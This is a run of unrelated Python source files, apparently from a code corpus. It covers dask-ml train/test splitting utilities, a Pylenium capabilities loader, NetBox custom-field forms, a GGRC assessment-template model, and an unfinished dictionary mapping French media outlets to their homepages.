patch_edges = np.float32(patch_edges)
imgs_batch.append(patch_image/255)
edge_batch.append(patch_edges/np.max(patch_edges))
num_images += 1
|
py | 7dfcea2b8462d08da0254784e273b77a2b337239 | """Utilities for splitting datasets.
"""
import itertools
import logging
import numbers
import dask
import dask.array as da
import dask.dataframe as dd
import numpy as np
import sklearn.model_selection as ms
from sklearn.model_selection._split import BaseCrossValidator, _validate_shuffle_split
from sklearn.utils import check_random_state
from dask_ml.utils import check_array, check_matching_blocks
from .._utils import draw_seed
logger = logging.getLogger(__name__)
def _check_blockwise(blockwise):
if blockwise not in {True, False}:
raise ValueError(
"Expected a boolean for 'blockwise " "but got {} instead".format(blockwise)
)
return blockwise
def _maybe_normalize_split_sizes(train_size, test_size):
# adopt scikit-learn's new behavior (complement) now.
if train_size is None and test_size is None:
msg = "test_size and train_size can not both be None"
raise ValueError(msg)
elif any(isinstance(x, numbers.Integral) for x in (train_size, test_size)):
raise ValueError(
"Dask-ML does not support absolute sizes for "
"'train_size' and 'test_size'. Use floats between "
"0 and 1 to specify the fraction of each block "
"that should go to the train and test set."
)
if train_size is not None:
if train_size < 0 or train_size > 1:
raise ValueError(
"'train_size' must be between 0 and 1. " "Got {}".format(train_size)
)
if test_size is None:
test_size = 1 - train_size
if test_size is not None:
if test_size < 0 or test_size > 1:
raise ValueError(
"'test_size' be between 0 and 1. " "Got {}".format(test_size)
)
if train_size is None:
train_size = 1 - test_size
if abs(1 - (train_size + test_size)) > 0.001:
raise ValueError(
"The sum of 'train_size' and 'test_size' must be 1. "
"train_size: {} test_size: {}".format(train_size, test_size)
)
return train_size, test_size
def _generate_idx(n, seed, n_train, n_test):
"""Generate train, test indices for a length-n array.
Parameters
----------
n : int
The length of the array
seed : int
Seed for a RandomState
n_train, n_test : int, 0 < n_train, n_test < n
Number of samples to use for the train or
test index.
Notes
-----
"""
idx = check_random_state(seed).permutation(n)
ind_test = idx[:n_test]
ind_train = idx[n_test : n_train + n_test]
return ind_train, ind_test
class ShuffleSplit(BaseCrossValidator):
"""Random permutation cross-validator.
Yields indices to split data into training and test sets.
.. warning::
By default, this performs a blockwise-shuffle. That is,
each block is shuffled internally, but data are not shuffled
between blocks. If your data is ordered, then set ``blockwise=False``.
Note: contrary to other cross-validation strategies, random splits
do not guarantee that all folds will be different, although this is
still very likely for sizeable datasets.
Parameters
----------
n_splits : int, default 10
Number of re-shuffling & splitting iterations.
test_size : float, int, None, default=0.1
If float, should be between 0.0 and 1.0 and represent the proportion
of the dataset to include in the test split. If int, represents the
absolute number of test samples. If None, the value is set to the
complement of the train size.
train_size : float, int, or None, default=None
If float, should be between 0.0 and 1.0 and represent the
proportion of the dataset to include in the train split. If
int, represents the absolute number of train samples. If None,
the value is automatically set to the complement of the test size.
blockwise : bool, default True
Whether to shuffle data only within blocks (True), or allow data to
be shuffled between blocks (False). Shuffling between blocks can
be much more expensive, especially in distributed environments.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(
self,
n_splits=10,
test_size=0.1,
train_size=None,
blockwise=True,
random_state=None,
):
self.n_splits = n_splits
self.test_size = test_size
self.train_size = train_size
self.random_state = random_state
self.blockwise = _check_blockwise(blockwise)
def split(self, X, y=None, groups=None):
X = check_array(X)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(X.chunks[0]), dtype="uint")
if self.blockwise:
yield self._split_blockwise(X, seeds)
else:
yield self._split(X)
def _split_blockwise(self, X, seeds):
chunks = X.chunks[0]
train_pct, test_pct = _maybe_normalize_split_sizes(
self.train_size, self.test_size
)
sizes = [_validate_shuffle_split(c, test_pct, train_pct) for c in chunks]
objs = [
dask.delayed(_generate_idx, nout=2)(chunksize, seed, n_train, n_test)
for chunksize, seed, (n_train, n_test) in zip(chunks, seeds, sizes)
]
train_objs, test_objs = zip(*objs)
offsets = np.hstack([0, np.cumsum(chunks)])
train_idx = da.concatenate(
[
da.from_delayed(x + offset, (train_size,), "i8")
for x, chunksize, (train_size, _), offset in zip(
train_objs, chunks, sizes, offsets
)
]
)
test_idx = da.concatenate(
[
da.from_delayed(x + offset, (test_size,), "i8")
for x, chunksize, (_, test_size), offset in zip(
test_objs, chunks, sizes, offsets
)
]
)
return train_idx, test_idx
def _split(self, X):
raise NotImplementedError(
"ShuffleSplit with `blockwise=False` has " "not been implemented yet."
)
def get_n_splits(self, X=None, y=None, groups=None):
return self.n_splits
def _generate_offset_idx(n, start, stop, offset, seed):
if seed is not None:
idx = check_random_state(seed).permutation(n)
else:
idx = np.arange(n)
return idx[start - offset : stop - offset] + offset
class KFold(BaseCrossValidator):
"""K-Folds cross-validator
Provides train/test indices to split data in train/test sets. Split
dataset into k consecutive folds (without shuffling by default).
Each fold is then used once as a validation while the k - 1 remaining
folds form the training set.
Parameters
----------
n_splits : int, default=5
Number of folds. Must be at least 2.
shuffle : boolean, optional
Whether to shuffle the data before splitting into batches.
random_state : int, RandomState instance or None, optional, default=None
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`. Used when ``shuffle`` == True.
"""
def __init__(self, n_splits=5, shuffle=False, random_state=None):
self.n_splits = n_splits
self.shuffle = shuffle
self.random_state = random_state
def split(self, X, y=None, groups=None):
X = check_array(X)
n_samples = X.shape[0]
n_splits = self.n_splits
fold_sizes = np.full(n_splits, n_samples // n_splits, dtype=np.int)
fold_sizes[: n_samples % n_splits] += 1
chunks = X.chunks[0]
seeds = [None] * len(chunks)
if self.shuffle:
rng = check_random_state(self.random_state)
seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(chunks), dtype="uint")
test_current = 0
for fold_size in fold_sizes:
test_start, test_stop = test_current, test_current + fold_size
yield self._split(test_start, test_stop, n_samples, chunks, seeds)
test_current = test_stop
def _split(self, test_start, test_stop, n_samples, chunks, seeds):
train_objs = []
test_objs = []
train_sizes = []
test_sizes = []
offset = 0
for chunk, seed in zip(chunks, seeds):
start, stop = offset, offset + chunk
test_id_start = max(test_start, start)
test_id_stop = min(test_stop, stop)
if test_id_start < test_id_stop:
test_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, test_id_start, test_id_stop, offset, seed
)
)
test_sizes.append(test_id_stop - test_id_start)
train_id_stop = min(test_id_start, stop)
if train_id_stop > start:
train_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, start, train_id_stop, offset, seed
)
)
train_sizes.append(train_id_stop - start)
train_id_start = max(test_id_stop, start)
if train_id_start < stop:
train_objs.append(
dask.delayed(_generate_offset_idx)(
chunk, train_id_start, stop, offset, seed
)
)
train_sizes.append(stop - train_id_start)
offset = stop
train_idx = da.concatenate(
[
da.from_delayed(obj, (train_size,), "i8")
for obj, train_size in zip(train_objs, train_sizes)
]
)
test_idx = da.concatenate(
[
da.from_delayed(obj, (test_size,), "i8")
for obj, test_size in zip(test_objs, test_sizes)
]
)
return train_idx, test_idx
def get_n_splits(self, X=None, y=None, groups=None):
return self.n_splits
def _blockwise_slice(arr, idx):
"""Slice an array that is blockwise-aligned with idx.
Parameters
----------
arr : Dask array
idx : Dask array
Should have the following properties
* Same blocks as `arr` along the first dimension
* Contains only integers
* Each block's values should be between ``[0, len(block))``
Returns
-------
sliced : dask.Array
"""
objs = []
offsets = np.hstack([0, np.cumsum(arr.chunks[0])[:-1]])
for i, (x, idx2) in enumerate(
zip(arr.to_delayed().ravel(), idx.to_delayed().ravel())
):
idx3 = idx2 - offsets[i]
objs.append(x[idx3])
shapes = idx.chunks[0]
if arr.ndim == 2:
P = arr.shape[1]
shapes = [(x, P) for x in shapes]
else:
shapes = [(x,) for x in shapes]
sliced = da.concatenate(
[
da.from_delayed(x, shape=shape, dtype=arr.dtype)
for x, shape in zip(objs, shapes)
]
)
return sliced
def train_test_split(*arrays, **options):
"""Split arrays into random train and test matricies.
Parameters
----------
*arrays : Sequence of Dask Arrays
test_size : float or int, default 0.1
train_size : float or int, optional
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
shuffle : bool, default True
Whether to shuffle the data before splitting.
blockwise : bool, optional.
Whether to shuffle data only within blocks (True), or allow data to
be shuffled between blocks (False). Shuffling between blocks can
be much more expensive, especially in distributed environments.
The default behavior depends on the types in arrays. For Dask Arrays,
the default is True (data are not shuffled between blocks). For Dask
DataFrames, the default and only allowed value is False (data are
shuffled between blocks).
Returns
-------
splitting : list, length=2 * len(arrays)
List containing train-test split of inputs
Examples
--------
>>> import dask.array as da
>>> from dask_ml.datasets import make_regression
>>> X, y = make_regression(n_samples=125, n_features=4, chunks=50,
... random_state=0)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... random_state=0)
>>> X_train
dask.array<concatenate, shape=(113, 4), dtype=float64, chunksize=(45, 4)>
>>> X_train.compute()[:2]
array([[ 0.12372191, 0.58222459, 0.92950511, -2.09460307],
[ 0.99439439, -0.70972797, -0.27567053, 1.73887268]])
"""
test_size = options.pop("test_size", None)
train_size = options.pop("train_size", None)
random_state = options.pop("random_state", None)
shuffle = options.pop("shuffle", True)
blockwise = options.pop("blockwise", None)
if train_size is None and test_size is None:
# all other validation dones elsewhere.
test_size = 0.1
if options:
raise TypeError("Unexpected options {}".format(options))
if not shuffle:
raise NotImplementedError("'shuffle=False' is not currently supported.")
if all(isinstance(arr, (dd.Series, dd.DataFrame)) for arr in arrays):
check_matching_blocks(*arrays)
if blockwise is None:
blockwise = False
rng = check_random_state(random_state)
rng = draw_seed(rng, 0, 2 ** 32 - 1, dtype="uint")
return list(
itertools.chain.from_iterable(
arr.random_split([train_size, test_size], random_state=rng)
for arr in arrays
)
)
elif all(isinstance(arr, da.Array) for arr in arrays):
if blockwise is None:
blockwise = True
splitter = ShuffleSplit(
n_splits=1,
test_size=test_size,
train_size=train_size,
blockwise=blockwise,
random_state=random_state,
)
train_idx, test_idx = next(splitter.split(*arrays))
train_test_pairs = (
(_blockwise_slice(arr, train_idx), _blockwise_slice(arr, test_idx))
for arr in arrays
)
return list(itertools.chain.from_iterable(train_test_pairs))
else:
logger.warning("Mixture of types in 'arrays'. Falling back to scikit-learn.")
return ms.train_test_split(
*arrays,
test_size=test_size,
train_size=train_size,
random_state=random_state,
shuffle=shuffle
)
|
py | 7dfceafb0e652164e3d1009e26ff8183a7011ba0 | from typing import Dict
from pytest import UsageError
from pylenium.exceptions.exceptions import NoCapabilitiesDictionaryException
from os.path import isfile
import importlib.util
def is_py_file(path: str) -> str:
"""
Raise a pytest UsageError if the path provided is not one of a valid .py file
:param path: the file path passed as an arg to some command line options
:return: the path if it was successfully located
"""
if not path.endswith(".py"):
raise UsageError(f"File path provided: {path} was not a .py file")
if not isfile(path):
raise UsageError(f"Pylenium was unable to find the file provided at: {path}")
return path
def parse_capabilities_from_disk(path: str) -> Dict:
"""
Takes the path provided to --browser-capabilities; loads it and attempts to discovery a 'capabilities' dictionary.
Note: This must be explicitly called 'capabilities' and should be of <class 'dict'>
:param path: the path on the file system to load
:return: The dictionary of desired capabilities that we found
"""
is_py_file(path)
spec = importlib.util.spec_from_file_location(name="py_desired_caps", location=path)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
try:
caps = mod.capabilities
if not isinstance(caps, Dict):
raise ValueError(
f"The .py file provided: {path} contained a 'capabilities' attribute, but it was not of"
f"type<Dict>"
)
return caps
except AttributeError:
raise NoCapabilitiesDictionaryException(
f"The .py file provided: {path} did not have a 'capabilities' attribute"
f"Make sure it contains one, explicitly called 'capabilities'"
) from None
|
py | 7dfceb39009879c5df7db62c4cb2694f3b58d489 | from __future__ import unicode_literals
from collections import OrderedDict
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from mptt.forms import TreeNodeMultipleChoiceField
from taggit.forms import TagField
from taggit.models import Tag
from dcim.models import DeviceRole, Platform, Region, Site
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
add_blank_choice, BootstrapMixin, BulkEditForm, FilterChoiceField, FilterTreeNodeMultipleChoiceField, LaxURLField,
JSONField, SlugField,
)
from .constants import (
CF_FILTER_DISABLED, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_INTEGER, CF_TYPE_SELECT, CF_TYPE_URL,
OBJECTCHANGE_ACTION_CHOICES,
)
from .models import ConfigContext, CustomField, CustomFieldValue, ImageAttachment, ObjectChange
#
# Custom fields
#
def get_custom_fields_for_model(content_type, filterable_only=False, bulk_edit=False):
"""
Retrieve all CustomFields applicable to the given ContentType
"""
field_dict = OrderedDict()
custom_fields = CustomField.objects.filter(obj_type=content_type)
if filterable_only:
custom_fields = custom_fields.exclude(filter_logic=CF_FILTER_DISABLED)
for cf in custom_fields:
field_name = 'cf_{}'.format(str(cf.name))
initial = cf.default if not bulk_edit else None
# Integer
if cf.type == CF_TYPE_INTEGER:
field = forms.IntegerField(required=cf.required, initial=initial)
# Boolean
elif cf.type == CF_TYPE_BOOLEAN:
choices = (
(None, '---------'),
(1, 'True'),
(0, 'False'),
)
if initial is not None and initial.lower() in ['true', 'yes', '1']:
initial = 1
elif initial is not None and initial.lower() in ['false', 'no', '0']:
initial = 0
else:
initial = None
field = forms.NullBooleanField(
required=cf.required, initial=initial, widget=forms.Select(choices=choices)
)
# Date
elif cf.type == CF_TYPE_DATE:
field = forms.DateField(required=cf.required, initial=initial, help_text="Date format: YYYY-MM-DD")
# Select
elif cf.type == CF_TYPE_SELECT:
choices = [(cfc.pk, cfc) for cfc in cf.choices.all()]
if not cf.required or bulk_edit or filterable_only:
choices = [(None, '---------')] + choices
# Check for a default choice
default_choice = None
if initial:
try:
default_choice = cf.choices.get(value=initial).pk
except ObjectDoesNotExist:
pass
field = forms.TypedChoiceField(choices=choices, coerce=int, required=cf.required, initial=default_choice)
# URL
elif cf.type == CF_TYPE_URL:
field = LaxURLField(required=cf.required, initial=initial)
# Text
else:
field = forms.CharField(max_length=255, required=cf.required, initial=initial)
field.model = cf
field.label = cf.label if cf.label else cf.name.replace('_', ' ').capitalize()
if cf.description:
field.help_text = cf.description
field_dict[field_name] = field
return field_dict
class CustomFieldForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.custom_fields = []
self.obj_type = ContentType.objects.get_for_model(self._meta.model)
super(CustomFieldForm, self).__init__(*args, **kwargs)
# Add all applicable CustomFields to the form
custom_fields = []
for name, field in get_custom_fields_for_model(self.obj_type).items():
self.fields[name] = field
custom_fields.append(name)
self.custom_fields = custom_fields
# If editing an existing object, initialize values for all custom fields
if self.instance.pk:
existing_values = CustomFieldValue.objects.filter(obj_type=self.obj_type, obj_id=self.instance.pk)\
.select_related('field')
for cfv in existing_values:
self.initial['cf_{}'.format(str(cfv.field.name))] = cfv.serialized_value
def _save_custom_fields(self):
for field_name in self.custom_fields:
try:
cfv = CustomFieldValue.objects.select_related('field').get(field=self.fields[field_name].model,
obj_type=self.obj_type,
obj_id=self.instance.pk)
except CustomFieldValue.DoesNotExist:
# Skip this field if none exists already and its value is empty
if self.cleaned_data[field_name] in [None, '']:
continue
cfv = CustomFieldValue(
field=self.fields[field_name].model,
obj_type=self.obj_type,
obj_id=self.instance.pk
)
cfv.value = self.cleaned_data[field_name]
cfv.save()
def save(self, commit=True):
obj = super(CustomFieldForm, self).save(commit)
# Handle custom fields the same way we do M2M fields
if commit:
self._save_custom_fields()
else:
self.save_custom_fields = self._save_custom_fields
return obj
class CustomFieldBulkEditForm(BulkEditForm):
def __init__(self, *args, **kwargs):
super(CustomFieldBulkEditForm, self).__init__(*args, **kwargs)
self.custom_fields = []
self.obj_type = ContentType.objects.get_for_model(self.model)
# Add all applicable CustomFields to the form
custom_fields = get_custom_fields_for_model(self.obj_type, bulk_edit=True).items()
for name, field in custom_fields:
# Annotate non-required custom fields as nullable
if not field.required:
self.nullable_fields.append(name)
field.required = False
self.fields[name] = field
# Annotate this as a custom field
self.custom_fields.append(name)
class CustomFieldFilterForm(forms.Form):
def __init__(self, *args, **kwargs):
self.obj_type = ContentType.objects.get_for_model(self.model)
super(CustomFieldFilterForm, self).__init__(*args, **kwargs)
# Add all applicable CustomFields to the form
custom_fields = get_custom_fields_for_model(self.obj_type, filterable_only=True).items()
for name, field in custom_fields:
field.required = False
self.fields[name] = field
#
# Tags
#
class TagForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Tag
fields = ['name', 'slug']
class AddRemoveTagsForm(forms.Form):
def __init__(self, *args, **kwargs):
super(AddRemoveTagsForm, self).__init__(*args, **kwargs)
# Add add/remove tags fields
self.fields['add_tags'] = TagField(required=False)
self.fields['remove_tags'] = TagField(required=False)
#
# Config contexts
#
class ConfigContextForm(BootstrapMixin, forms.ModelForm):
regions = TreeNodeMultipleChoiceField(
queryset=Region.objects.all(),
required=False
)
data = JSONField()
class Meta:
model = ConfigContext
fields = [
'name', 'weight', 'description', 'is_active', 'regions', 'sites', 'roles', 'platforms', 'tenant_groups',
'tenants', 'data',
]
class ConfigContextFilterForm(BootstrapMixin, forms.Form):
q = forms.CharField(
required=False,
label='Search'
)
region = FilterTreeNodeMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug'
)
site = FilterChoiceField(
queryset=Site.objects.all(),
to_field_name='slug'
)
role = FilterChoiceField(
queryset=DeviceRole.objects.all(),
to_field_name='slug'
)
platform = FilterChoiceField(
queryset=Platform.objects.all(),
to_field_name='slug'
)
tenant_group = FilterChoiceField(
queryset=TenantGroup.objects.all(),
to_field_name='slug'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.all(),
to_field_name='slug'
)
#
# Image attachments
#
class ImageAttachmentForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ImageAttachment
fields = ['name', 'image']
#
# Change logging
#
class ObjectChangeFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = ObjectChange
q = forms.CharField(
required=False,
label='Search'
)
# TODO: Change time_0 and time_1 to time_after and time_before for django-filter==2.0
time_0 = forms.DateTimeField(
label='After',
required=False,
widget=forms.TextInput(
attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'}
)
)
time_1 = forms.DateTimeField(
label='Before',
required=False,
widget=forms.TextInput(
attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'}
)
)
action = forms.ChoiceField(
choices=add_blank_choice(OBJECTCHANGE_ACTION_CHOICES),
required=False
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by('username'),
required=False
)
|
py | 7dfceba4c8be608d31ffa0df5f8a9dd22e6cc56a | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module containing the implementation of the assessment template entity."""
from collections import OrderedDict
from sqlalchemy import orm
from sqlalchemy.orm import validates
from werkzeug.exceptions import Forbidden
from ggrc import db
from ggrc.access_control.roleable import Roleable
from ggrc import login
from ggrc.builder import simple_property
from ggrc.models import assessment
from ggrc.models import audit
from ggrc.models import mixins
from ggrc.models import relationship
from ggrc.models.mixins import base
from ggrc.models.mixins import clonable
from ggrc.models.mixins import issue_tracker
from ggrc.models.exceptions import ValidationError
from ggrc.models.reflection import AttributeInfo
from ggrc.models import reflection
from ggrc.models.types import JsonType
from ggrc.services import signals
from ggrc.fulltext.mixin import Indexed
from ggrc.rbac.permissions import permissions_for
def _hint_verifier_assignees(actual_people_label, control_people_label,
risk_people_label):
"""Returns description default verifiers/assignees fields"""
description = "For all Assessment Types except of " \
"Control and Risk options are:\n{}\[email protected]\n" \
"For Assessment type of Control options are:\n{}\n" \
"[email protected]\n" \
"For Assessment type of Risk options are:\n{}\n" \
"[email protected]".format(
"\n".join(actual_people_label.values()),
"\n".join(control_people_label.values()),
"\n".join(risk_people_label.values()))
return description
class AssessmentTemplate(assessment.AuditRelationship,
relationship.Relatable,
mixins.Titled,
mixins.CustomAttributable,
Roleable,
issue_tracker.IssueTrackedWithConfig,
base.ContextRBAC,
mixins.Slugged,
mixins.Stateful,
clonable.MultiClonable,
Indexed,
db.Model):
"""A class representing the assessment template entity.
An Assessment Template is a template that allows users for easier creation of
multiple Assessments that are somewhat similar to each other, avoiding the
need to repeatedly define the same set of properties for every new Assessment
object.
"""
__tablename__ = "assessment_templates"
_mandatory_default_people = ("assignees",)
PER_OBJECT_CUSTOM_ATTRIBUTABLE = True
RELATED_TYPE = 'assessment'
# the type of the Default Assessment Type
template_object_type = db.Column(db.String, nullable=True)
# whether to use the control test plan as a procedure
test_plan_procedure = db.Column(db.Boolean, nullable=False, default=False)
# procedure description
procedure_description = db.Column(db.Text, nullable=False, default=u"")
# the people that should be assigned by default to each assessment created
# within the releated audit
default_people = db.Column(JsonType, nullable=False)
# parent audit
audit_id = db.Column(db.Integer, db.ForeignKey('audits.id'), nullable=False)
# labels to show to the user in the UI for various default people values
DEFAULT_PEOPLE_LABELS = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Primary Contacts", "Primary Contacts"),
("Secondary Contacts", "Secondary Contacts"),
("Control Operators", "Control Operators"),
("Control Owners", "Control Owners"),
("Risk Owners", "Risk Owners"),
("Other Contacts", "Other Contacts"),
])
# labels to show as hint all Assessment Types except of Control and Risk
_DEFAULT_PEOPLE_LABELS_ACTUAL = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Primary Contacts", "Primary Contacts"),
("Secondary Contacts", "Secondary Contacts"),
])
# labels to show as hint in Default Assignees/Verifiers for Control
_DEFAULT_PEOPLE_LABELS_CONTROL = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Control Operators", "Control Operators"),
("Control Owners", "Control Owners"),
("Other Contacts", "Other Contacts"),
])
# labels to show as hint in Default Assignees/Verifiers for Risk
_DEFAULT_PEOPLE_LABELS_RISK = OrderedDict([
("Admin", "Object Admins"),
("Audit Lead", "Audit Captain"),
("Auditors", "Auditors"),
("Principal Assignees", "Principal Assignees"),
("Secondary Assignees", "Secondary Assignees"),
("Risk Owners", "Risk Owners"),
("Other Contacts", "Other Contacts"),
])
_title_uniqueness = False
DRAFT = 'Draft'
ACTIVE = 'Active'
DEPRECATED = 'Deprecated'
VALID_STATES = (DRAFT, ACTIVE, DEPRECATED, )
# REST properties
_api_attrs = reflection.ApiAttributes(
'template_object_type',
'test_plan_procedure',
'procedure_description',
'default_people',
'audit',
reflection.Attribute('issue_tracker', create=False, update=False),
reflection.Attribute('archived', create=False, update=False),
reflection.Attribute(
'DEFAULT_PEOPLE_LABELS', create=False, update=False),
)
_fulltext_attrs = [
"archived"
]
_custom_publish = {
'audit': audit.build_audit_stub,
}
DEFAULT_ASSESSMENT_TYPE_OPTIONS = ("Access Groups",
"Account Balances",
"Data Assets",
"Facilities",
"Key Reports",
"Markets",
"Org Groups",
"Processes",
"Product Groups",
"Products",
"Systems",
"Technology Environments",
"Vendors",
"Contracts",
"Controls",
"Objectives",
"Policies",
"Regulations",
"Requirements",
"Risks",
"Standards",
"Threats",
)
_aliases = {
"status": {
"display_name": "State",
"mandatory": False,
"description": "Options are:\n{}".format('\n'.join(VALID_STATES))
},
"default_assignees": {
"display_name": "Default Assignees",
"mandatory": True,
"filter_by": "_nop_filter",
"description": _hint_verifier_assignees(
_DEFAULT_PEOPLE_LABELS_ACTUAL,
_DEFAULT_PEOPLE_LABELS_CONTROL,
_DEFAULT_PEOPLE_LABELS_RISK,
)
},
"default_verifier": {
"display_name": "Default Verifiers",
"mandatory": False,
"filter_by": "_nop_filter",
"description": _hint_verifier_assignees(
_DEFAULT_PEOPLE_LABELS_ACTUAL,
_DEFAULT_PEOPLE_LABELS_CONTROL,
_DEFAULT_PEOPLE_LABELS_RISK,
)
},
"procedure_description": {
"display_name": "Default Assessment Procedure",
"filter_by": "_nop_filter",
},
"test_plan_procedure": {
"display_name": "Use Control Assessment Procedure",
"mandatory": False,
},
"template_object_type": {
"display_name": "Default Assessment Type",
"mandatory": True,
"description": "Allowed values are:\n{}".format(
'\n'.join(DEFAULT_ASSESSMENT_TYPE_OPTIONS)),
},
"archived": {
"display_name": "Archived",
"mandatory": False,
"ignore_on_update": True,
"view_only": True,
},
"template_custom_attributes": {
"display_name": "Custom Attributes",
"type": AttributeInfo.Type.SPECIAL_MAPPING,
"filter_by": "_nop_filter",
"description": (
"List of custom attributes for the assessment template\n"
"One attribute per line. fields are separated by commas ','\n\n"
"<attribute type>, <attribute name>, [<attribute value1>, "
"<attribute value2>, ...]\n\n"
"Valid attribute types: Text, Rich Text, Date, Checkbox, Person,"
"Multiselect, Dropdown.\n"
"attribute name: Any single line string without commas. Leading "
"and trailing spaces are ignored.\n"
"list of attribute values: Comma separated list, only used if "
"attribute type is 'Dropdown'. Prepend '(a)' if the value has a "
"mandatory attachment and/or (c) if the value requires a "
"mandatory comment.\n\n"
"Limitations: Dropdown values can not start with either '(a)' or"
"'(c)' and attribute names can not contain commas ','."
),
},
}
@classmethod
def eager_query(cls, **kwargs):
query = super(AssessmentTemplate, cls).eager_query(**kwargs)
return query.options(
orm.Load(cls).joinedload("audit").undefer_group("Audit_complete"),
orm.Load(cls).joinedload("audit").joinedload(
audit.Audit.issuetracker_issue
),
)
@classmethod
def indexed_query(cls):
query = super(AssessmentTemplate, cls).indexed_query()
return query.options(
orm.Load(cls).joinedload("audit").undefer_group("Audit_complete")
)
@classmethod
def _nop_filter(cls, _):
"""No operation filter.
This is used for objects for which we can not implement a normal sql query
filter. Example is default_verifier field that is a json string in the db
and we can not create direct queries on json fields.
"""
return None
@classmethod
def generate_slug_prefix(cls):
return "TEMPLATE"
def _clone(self, target=None):
"""Clone Assessment Template.
Args:
target: Destination Audit object.
Returns:
Instance of assessment template copy.
"""
data = {
"title": self.title,
"audit": target,
"template_object_type": self.template_object_type,
"test_plan_procedure": self.test_plan_procedure,
"procedure_description": self.procedure_description,
"default_people": self.default_people,
"modified_by": login.get_current_user(),
"status": self.status,
}
assessment_template_copy = AssessmentTemplate(**data)
db.session.add(assessment_template_copy)
return assessment_template_copy
def clone(self, target):
"""Clone Assessment Template and related custom attributes."""
assessment_template_copy = self._clone(target)
rel = relationship.Relationship(
source=target,
destination=assessment_template_copy
)
db.session.add(rel)
db.session.flush()
# pylint: disable=not-an-iterable
for cad in self.custom_attribute_definitions:
# pylint: disable=protected-access
cad._clone(assessment_template_copy)
return (assessment_template_copy, rel)
@validates('default_people')
def validate_default_people(self, key, value):
"""Check that default people lists are not empty.
Check if the default_people contains both assignees and verifiers. The
values of those fields must be truthy, and if the value is a string it
must be a valid default people label. If the value is not a string, it
should be a list of valid user ids, but that is too expensive to test in
this validator.
"""
# pylint: disable=unused-argument
for mandatory in self._mandatory_default_people:
mandatory_value = value.get(mandatory)
if (not mandatory_value or
isinstance(mandatory_value, list) and
any(not isinstance(p_id, (int, long))
for p_id in mandatory_value) or
isinstance(mandatory_value, basestring) and
mandatory_value not in self.DEFAULT_PEOPLE_LABELS):
raise ValidationError(
'Invalid value for default_people.{field}. Expected a people '
'label in string or a list of int people ids, received {value}.'
.format(field=mandatory, value=mandatory_value),
)
return value
@simple_property
def archived(self):
"""Fetch the archived boolean from Audit"""
if hasattr(self, 'context') and hasattr(self.context, 'related_object'):
return getattr(self.context.related_object, 'archived', False)
return False
def create_audit_relationship(audit_stub, obj):
"""Create audit to assessment template relationship"""
# pylint: disable=W0212
parent_audit = audit.Audit.query.get(audit_stub["id"])
if not permissions_for()._is_allowed_for(parent_audit, "update"):
raise Forbidden()
rel = relationship.Relationship(
source=parent_audit,
destination=obj,
context=parent_audit.context)
db.session.add(rel)
@signals.Restful.model_posted.connect_via(AssessmentTemplate)
def handle_assessment_template(sender, obj=None, src=None, service=None):
# pylint: disable=unused-argument
"""Handle Assessment Template POST
If "audit" is set on POST, create relationship with Assessment template.
"""
if "audit" in src:
create_audit_relationship(src["audit"], obj)
|
py | 7dfcecdd6b1d909d159ecd059d519a3cb47bdddd | # coding=utf-8
# =============================================================================
# Website Finder
# =============================================================================
#
# A function returning the homepage of the website of a media
#
import re
import json
import csv
from tqdm import tqdm
dic_homepage = {"La Voix du Nord": "www.lavoixdunord.fr",
"Le Figaro": "www.lefigaro.fr",
"La Montagne": "www.lamontagne.fr",
"Les Echos": "www.lesechos.fr",
"Le Courrier de l'Ouest": "www.ouest-france.fr",
"La Dépêche du Midi": "www.ladepeche.fr",
"Le Télégramme": "www.letelegramme.fr",
"Le Figaro Magazine": "https:/www.lefigaro.fr/lefigaromagazine",
"La Nouvelle République du Centre Ouest": "www.lanouvellerepublique.fr",
"Les Echos Business": "business.lesechos.fr",
"Sud Ouest": "www.sudouest.fr",
"Le Républicain Lorrain": "www.republicain-lorrain.fr",
"Les Echos Executives": "business.lesechos.fr",
"M, le magazine du Monde": "www.lemonde.fr/m-le-mag",
"La Croix": "www.la-croix.com",
"Les Echos Business.fr": "business.lesechos.fr",
"Capitalfinance.fr": "capitalfinance.lesechos.fr",
"Le Cercle Les Echos": "inurl:lesechos.fr/idees-debats/cercle",
"Capital Finance": "capitalfinance.lesechos.fr",
"Les Echos Week-End": "weekend.lesechos.fr",
"Le Progrès": "www.leprogres.fr",
"Midi Libre": "www.midilibre.fr/actu",
